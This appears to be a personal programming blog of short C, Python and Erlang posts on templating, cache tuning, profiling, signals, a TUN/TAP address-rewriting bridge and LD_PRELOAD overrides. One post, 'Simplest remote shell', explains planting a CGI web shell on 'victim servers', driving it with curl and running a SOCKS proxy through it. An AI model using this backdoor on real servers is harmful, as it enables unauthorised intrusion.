Using templates in PHP and C++ has spoiled me. So when I started developing applications in C, I went hunting for a templating library that I could use again. I didn't find it, so after developing in a mixture of C for my lowlevel routines and C++ for my interface, I finally broke down and wrote a templating engine in C. (See Free HTML Template Engine.)
An example
#include "template.h"

int
main(void) {
    struct tpl_engine *engine;
    int n;
    char n1[10], n2[10], n3[10];
    engine = tpl_engine_new();

    /* Load the template file */
    tpl_file_load(engine, "test.tpl");

    for(n = 1; n <= 10; n++) {
        sprintf(n1, "%d", n);
        sprintf(n2, "%d", n*n);
        sprintf(n3, "%d", n*n*n);
        tpl_element_set(engine, "n", n1);
        tpl_element_set(engine, "n2", n2);
        tpl_element_set(engine, "n3", n3);

        /* Parse the template 'row' and add the result to element 'rows' */
        tpl_parse(engine, "row", "rows", 1);
    }

    tpl_parse(engine, "grid", "main", 0);
    printf("%s", tpl_element_get(engine, "main"));

    return 0;
}
test.tpl
<template name="grid">
<table>
<tr>
<th>n</th>
<th>nˆ2</th>
<th>nˆ3</th>
</tr>
{rows}
</table>
</template>
<template name="row">
<tr>
<td>{n}</td>
<td>{n2}</td>
<td>{n3}</td>
</tr>
</template> 

Don't optimize when you are not asked to

The code below as you may guess multiplies two matrices (see Ulrich Drepper, What Every Programmer Should Know About Memory)
for (i = 0;  i < N; ++i)
    for (j = 0; j < N; ++j)
        for (k = 0; k < N; ++k)
            res[i][j] += mul1[i][k] * mul2[k][j];
The next piece of code does the same (as you probably may not guess anymore)
#define SM (CLS / sizeof (double))

for (i = 0; i < N; i += SM)
    for (j = 0; j < N; j += SM)
        for (k = 0; k < N; k += SM)
            for (i2 = 0, rres = &res[i][j],
                rmul1 = &mul1[i][k]; i2 < SM;
                ++i2, rres += N, rmul1 += N)
                for (k2 = 0, rmul2 = &mul2[k][j];
                    k2 < SM; ++k2, rmul2 += N)
                    for (j2 = 0; j2 < SM; ++j2)
                        rres[j2] += rmul1[k2] * rmul2[j2];
where CLS is a linesize of L1d cache
gcc -DCLS=$(getconf LEVEL1_DCACHE_LINESIZE) ...
The speed
OriginalTuned
Cycles16,765,297,872,895,041,480
Relative100%17.3%

But the main difference as author says is
This looks quite scary.
This smacks of premature optimisation and the possibility the user really does not know what they are talking about, not to mention the problem of portability.
See Why not cache lines.

Fundamentals, C arrays and pointers

Why C arrays are not pointers? Well, by definition
In C, there is a strong relationship between pointers and arrays, strong enough that pointers and arrays should be discussed simultaneously. (K&R)
They are easy to mix up
When an array name is passed to a function, what is passed is the location of the initial element. (K&R)
An example
#include <stdio.h>

void func(char subarray[100], char* pointer) {
    printf("sizeof subarray=%zd\n", sizeof(subarray));
    printf("address of subarray=%p\n", (void *)subarray);
    printf("pointer=%p\n", (void *)pointer);
}

int main() {
    char array[100];
    printf("sizeof of array=%zd\n", sizeof(array));
    printf("address of array=%p\n", (void *)array);
    printf("address of array[0]=%p\n", (void *)&array[0]);
    func(array, array);
}

// ----------------------------------------

sizeof of array=100
address of array=0xbfbfe760
address of array[0]=0xbfbfe760
sizeof subarray=4
address of subarray=0xbfbfe760
pointer=0xbfbfe760 

Python, profiling

'Have you seen python web developers who do high load site development for living?'
'Oh, almost all of them do such things,' you say.
'Have you seen python devs who know how to debug?'
'A few,' you say.
'Have you seen python devs who profile things that supposed to be high loaded?'

Python has cProfile, C has kcachegrind, they look good together.

For instance, lets profile multithreaded wsgi app. Change your handler
def read(self, request, *args, **kwargs):
    ...
    return ...
To something like
def read(self, *args, **kwargs):
    import cProfile
    import uuid
    cProfile.runctx('self.read2(*args, **kwargs)', globals(), locals(),
        '/folder_with_stats/' + uuid.uuid4().get_hex())
    return self.__res

def read2(self, *args, **kwargs):
    self.__res = self.read3(*args, **kwargs)

def read3(self, request, *args, **kwargs):
    ...
    return ...
Then (high) load your app. Gather results from folder_with_stats
import os
import pstats
import time
from pyprof2calltree import convert

# Collect stats
p = None
for i in os.listdir('/folder_with_stats'):
    filename = '/folder_with_stats/' + i
    if not p:
        p = pstats.Stats(filename)
    else:
        p.add(filename)
    os.unlink(filename)
res = str(int(time.time())) + '.kgrind'
convert(p, res)

os.execlp('kcachegrind', res)
The main thing here to note is pyprof2calltree. The result

If you want httperf with libev on board

Ab eats CPU, so does httperf. Use Weighttp
weighttp -n 1000000 -c 100 -t 10 -k http://localhost/

Reminder, download big files via ssh

When downloading (uploading) big enough file via ssh scp is not the best solution while after termination one needs to resume upload.
Solution
rsync --inplace -P -e "ssh -i key.pem" IN OUT
Note the --inplace parameter.

Signals and threads in python

The task: start a set of processes and wait till they terminate, if SIGTERM is received send same signal to all child processes and again wait till they terminate. (Ok, I'd go with sending signal to the process group, but however.)
The naive solution: use subprocess and threading modules, start thread per child process and communicate(), in main thread join() with others. Why naive? This doesn't work. Signal handler is not invoked. The documentation to signal module says:
Although Python signal handlers are called asynchronously as far as the Python user is concerned, they can only occur between the "atomic" instructions of the Python interpreter. This means that signals arriving during long calculations implemented purely in C (such as regular expression matches on large bodies of text) may be delayed for an arbitrary amount of time.
That is signal handler will be processed only after current "atomic" operation finishes. Unfortunately join() is one of such atomic operations. In other works signal handler will be invoked only after thread termination.
Another way is to use coroutines and select:
proc = subprocess.Popen(cmd,
                        stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT,
                        close_fds=True,
                        preexec_fn=preexec_fn)

fdesc = proc.stdout.fileno()
flags = fcntl.fcntl(fdesc, fcntl.F_GETFL)
fcntl.fcntl(fdesc, fcntl.F_SETFL, flags | os.O_NONBLOCK)

while True:
    try:
        dt = proc.stdout.read()
        if dt == '':
            break
        yield dt
    except IOError:
        # EWOULDBLOCK
        
        yield ''
        
        try:
            select.select([proc.stdout], [], [], 1)
        except select.error:
            # select.error: (4, 'Interrupted system call') - ignore it,
            # just call select again
            pass

while True:
    try:
        proc.wait()
        break
    except OSError:
        # OSError: [Errno 4] Interrupted system call
        continue
And the supervisor (left - an array of generators from coroutines)
while left:
    new_left = []
    
    for execute in left:
        try:
            execute.next()
            new_left.append(execute)
        except StopIteration:
            pass
        except Exception, e:
            err = e

    left = new_left
Also note that EINTR in general is not processed by python standard library, it is just forwarded up the stack as C does. In most cases if you are lucky it is enough to call interrupted routine again as in C (but C guarantees that this works, python doesn't).

Python, how to open TUN/TAP device

Just a note in case I forget
def open(n):
    TUNSETIFF = 0x400454ca
    IFF_TUN   = 0x0001
    IFF_TAP   = 0x0002
    TUNMODE = IFF_TAP
    MODE = 0
    DEBUG = 0
    f = os.open("/dev/net/tun", os.O_RDWR)
    ifs = ioctl(f, TUNSETIFF, struct.pack("16sH", "tap%d" % n, TUNMODE))
    #ifname = ifs[:16].strip("\x00")
    return f
And then as usual
f1 = open(1)
f2 = open(2)

p = os.read(f1, 65000)
os.write(f2, p)

os.close(f1)
os.close(f2)

Friday, December 20, 2013

Programming TUN/TAP in Linux, changing IP address on the fly

So you want to map one network to another by implementing your very own bridge that changes network in IP packets it receives and forwards them to other segment. Why not I say, could be.
The plan is
  1. Create 2 tap interfaces: tap1 and tap2.
  2. Bridge tap1 with eth0 (i.e. everything that reaches tap1 is being forwarded to eth0 by kernel and vice versa).
  3. Application gets packets from tap2, changes src and dst IP addresses (changes network 10.0.0.0/24 to 192.168.14.0/24) and writes resulting packet to tap1 (then to eth0 and to the wires).
  4. When application gets response from eth0 (tap1) it substitutes IPs again and writes to tap2.
Note: the problem with IP substitution is in checksums. IP packets have IP header checksum, TCP and UDP also has checksum of pseudoheader that contains src and dst IP addresses as well. See details in the code.
For more information on TUN/TAP try to read Universal TUN/TAP device driver Frequently Asked Question.
In this way if you are in 192.168.14.0/24 network and want to speak with 192.168.14.15 after small manipulations you can speak with that host as if it had address 10.0.0.15.
The instructions and program itself without any further comments are below.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <linux/if_tun.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/select.h>
#include <stdint.h>
#include <arpa/inet.h>

#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>


/* 
Replace ip addresses in packets on L2 level.

Setup:

tunctl -t tap1
tunctl -t tap2
brctl addif br1 tap1
brctl addif br1 eth0

ifconfig tap1 promisc up
ifconfig tap2 promisc up

ifconfig tap2 10.0.1.18 netmask 255.255.255.0

Send packets to 10.0.0.0/24 on tap2, they will appear as 192.168.14.0/24 on eth0.
Note that these values are harcoded in main.

*/


static int
tun_alloc_old(char *dev) {
    char tunname[IFNAMSIZ];

    sprintf(tunname, "/dev/%s", dev);
    return open(tunname, O_RDWR);
}


static int
tun_alloc(char *dev) {
    struct ifreq    ifr;
    int     fd;
    int     err;

    if ((fd = open("/dev/net/tun", O_RDWR)) < 0)
        return tun_alloc_old(dev);

    memset(&ifr, 0, sizeof(ifr));

    /* Flags: IFF_TUN   - TUN device (no Ethernet headers)
     *        IFF_TAP   - TAP device
     *
     *        IFF_NO_PI - Do not provide packet information
     */
    ifr.ifr_flags = IFF_TAP;
    if (*dev)
        strncpy(ifr.ifr_name, dev, IFNAMSIZ);

    if ((err = ioctl(fd, TUNSETIFF, (void*)&ifr)) < 0) {
        close(fd);
        perror("TUNSETIFF");
        return err;
    }

    strcpy(dev, ifr.ifr_name);
    return fd;
}


static size_t
write2(int fildes, const void *buf, size_t nbyte) {
    int     ret;
    size_t  n;

    n = nbyte;
    while (n > 0) {
        ret = write(fildes, buf, nbyte);
        if (ret < 0)
            return ret;

        n -= ret;
        buf += ret;
    }

    return nbyte;
}


static uint16_t
ipcheck(uint16_t *ptr, size_t len) {
    uint32_t    sum;
    uint16_t    answer;

    sum = 0;

    while (len > 1) {
        sum += *ptr++;
        len -= 2;
    }

    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    
    return answer;
}


static uint16_t
check2(struct iovec *iov, int iovcnt) {
    long    sum;
    uint16_t    answer;
    struct iovec   *iovp;

    sum = 0;

    for (iovp = iov; iovp < iov + iovcnt; iovp++) {
        uint16_t *ptr;
        size_t len;

        ptr = iovp->iov_base;
        len = iovp->iov_len;

        while (len > 1) {
            sum += *ptr++;
            len -= 2;
        }

        if (len == 1) {
            u_char t[2];
            t[0] = (u_char)*ptr;
            t[1] = 0;

            sum += (uint16_t)*t;
        }

    }

    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    answer = ~sum;
    
    return answer;
}


static void
tcpcheck(struct iphdr *iph, struct tcphdr *tcph, size_t len) {
    struct iovec iov[5];

    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;

    u_char  t[2];
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;

    uint16_t l;
    l = htons(tcph->doff * 4 + len);
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;

    iov[4].iov_base = tcph;
    iov[4].iov_len = tcph->doff * 4 + len;

    tcph->check = 0;
    tcph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}


static void
udpcheck(struct iphdr *iph, struct udphdr *udph) {
    struct iovec iov[5];

    iov[0].iov_base = &iph->saddr;
    iov[0].iov_len = 4;
    iov[1].iov_base = &iph->daddr;
    iov[1].iov_len = 4;

    u_char  t[2];
    t[0] = 0;
    t[1] = iph->protocol;
    iov[2].iov_base = t;
    iov[2].iov_len = 2;

    uint16_t l;
    l = udph->len;
    iov[3].iov_base = &l;
    iov[3].iov_len = 2;

    iov[4].iov_base = udph;
    iov[4].iov_len = ntohs(udph->len);

    udph->check = 0;
    udph->check = check2(iov, sizeof(iov) / sizeof(struct iovec));
}


static int
substitute(u_char* buf, ssize_t n, u_char* net1, u_char* net2) {

    if (buf[12] == 8 && buf[13] == 6) {
        u_char     *arp;

        arp = buf + 14;

        /* replace ip */
        if (!memcmp(arp + 14, net1, 3)) {
            memcpy(arp + 14, net2, 3);
        }

        if (!memcmp(arp + 24, net1, 3)) {
            memcpy(arp + 24, net2, 3);
        }
    }
    else if (buf[12] == 8 && buf[13] == 0) {
        struct iphdr   *iph;
        size_t      len;


        iph = (struct iphdr*)(buf + 14);
        len = iph->ihl * 4;

        /* clear crc */
        iph->check = 0;


        /* replcace ip */
        if (!memcmp(&iph->saddr, net1, 3)) {
            memcpy(&iph->saddr, net2, 3);
        }

        if (!memcmp(&iph->daddr, net1, 3)) {
            memcpy(&iph->daddr, net2, 3);
        }

        /* put new crc */
        iph->check = ipcheck((uint16_t*)iph, len);


        if (iph->protocol == 6) {
            struct tcphdr  *tcph;

            tcph = (struct tcphdr*)((u_char*)iph + len);
            tcpcheck(iph, tcph, n - ((u_char*)tcph - buf) - tcph->doff * 4);
        }
        else if (iph->protocol == 17) {
            struct udphdr  *udph;

            udph = (struct udphdr*)((u_char*)iph + len);
            udpcheck(iph, udph);
        }
    }

    return 0;
}


int
main(int argc, char **argv) {
    int     tap1;
    int     tap2;
    int     maxfd;
    char    tunname[IFNAMSIZ];
    u_char  buf[15000];
    ssize_t n;

    u_char net1[] = {192, 168, 14};
    u_char net2[] = {10, 0, 1};

    strcpy(tunname, "tap1");
    if ((tap1 = tun_alloc(tunname)) < 0) {
        goto error;
    }

    strcpy(tunname, "tap2");
    if ((tap2 = tun_alloc(tunname)) < 0) {
        goto error;
    }

    maxfd = (tap1 > tap2)? tap1 : tap2;

    while (1) {
        int     ret;
        fd_set  rd_set;
        
        FD_ZERO(&rd_set);
        FD_SET(tap1, &rd_set);
        FD_SET(tap2, &rd_set);
    
        ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL);
        
        if (ret < 0 && errno == EINTR) {
            continue;
        }

        if (ret < 0) {
            perror("select()");
            goto error;
        }

        if (FD_ISSET(tap1, &rd_set)) {
            n = read(tap1, buf, sizeof(buf));
            if (n < 0)
                goto error;

            if (substitute(buf, n, net1, net2))
                goto error;

            if (write2(tap2, buf, n) < 0)
                goto error;
        }

        if (FD_ISSET(tap2, &rd_set)) {

            n = read(tap2, buf, sizeof(buf));
            if (n < 0)
                goto error;

            if (substitute(buf, n, net2, net1))
                goto error;

            if (write2(tap1, buf, n) < 0)
                goto error;
        }
    }
    
    close(tap1);
    close(tap2);

    return 0;

error:
    return 1;
}

Simplest remote shell

Any true webmaster at least once has installed some remote shells (backdoors) to victim servers. I've used the simplest backdoor ever existed.
First create file sh.cgi and upload it to the victim server (don't forget to set execute permissions)
#!/bin/sh

/bin/sh
That is all our remote shell implementation. Locally create file lets say with the name 1
echo -e "Content-Type: text/plain\r\n\r"
uname -a
id
exit 0
Test it
> curl --data-binary @1 http://host/sh.cgi
Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If you are lucky you can upload files, compile them and run
echo -e "Content-Type: text/plain\r\n\r"
cc socks.c 2>&1
./a.out 2>&1
exit 0
Download socks.c. Imlements SOCKS5, addresses are harcoded.

Erlang, how to change backlog in http inets server

Moving my very old posts from old engine I've found interesting problem on increasing backlog from 128 that is inappropriate for loaded system to something more suitable. Long time ago (in 2010) an only way I found to do this was to apply the following patch
> diff -u /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl http_transport.erl 
--- /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl     2010-09-28 12:45:42.000000000 +0300
+++ http_transport.erl  2010-12-08 17:57:42.759407719 +0200
@@ -218,7 +218,7 @@
 
 get_socket_info(Addr, Port) ->
     Key  = list_to_atom("httpd_" ++ integer_to_list(Port)),
-    BaseOpts =  [{backlog, 128}, {reuseaddr, true}], 
+    BaseOpts =  [{backlog, 10000}, {reuseaddr, true}], 
     IpFamilyDefault = ipfamily_default(Addr, Port), 
     case init:get_argument(Key) of
        {ok, [[Value]]} ->
I wonder whether this is still true.

Override function in shared library

Lets override write() in libc
#define _GNU_SOURCE /* for RTLD_NEXT */

static ssize_t (*libc_write)(int, const void *, size_t);

void init(void) __attribute__((constructor));
void init(void) {
    libc_write = dlsym(RTLD_NEXT, "write");
}

ssize_t write(int fd, const void *buf, size_t count) {
    // do what you want here
    return libc_write(fd, buf, count);
}
Then one needs to assemble .so and put it earlier than libc.so, something like
LD_PRELOAD=/path/to/so/with/our/write.so victim_program
See Function Attributes, dlsym(3).